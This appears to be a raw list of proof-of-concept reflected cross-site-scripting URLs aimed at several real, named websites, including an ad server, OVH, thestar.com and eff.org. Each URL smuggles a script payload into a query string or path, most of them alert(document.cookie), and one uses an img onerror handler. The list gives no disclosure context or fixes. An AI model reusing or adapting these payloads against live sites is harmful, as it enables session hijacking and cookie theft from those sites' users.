http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BXHXNHTtyTc3sEcqGlget8L3KBpWpie8BhaKK8hLjqLazM6DUkgIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAVFmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3NxbC1pbmplY3Rpb24teHNzLWZldGNoZG9nY29tLWN3ZTc5LWN3ZTg5Lmh0bWy4AhjAAgXIAuXvxRioAwHRA03G05dUI6-R6AP2BugDswToA_IG9QMAAADE&num=1&sig=AGiWqtxkKZPosMFRS4XthGZnKkwh1QqVnw&client=ca-pub-4063878933780912&adurl=406ba%22-alert(document.cookie)-%22f32a8385649

.

http://www.fstsummiteurope.com/protected.php?return=9b7c6%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed22ba750c7c&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000069)%3C/script%3E

.

http://travaux.ovh.net/?2dc7b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed6f03fe4629=1

.

http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04

.

http://www.thestar.com/Toplets/User?469d2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea4549f98675=1

.

http://www.eff.org/br54acd%22%3E%3Cimg%20src%3da%20onerror%3dalert(String.fromCharCode(88,83,83))%3E28d7556c99a/brstrip.gif

.

http://csscreator.com/topic/center-site32bfb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea0943c43709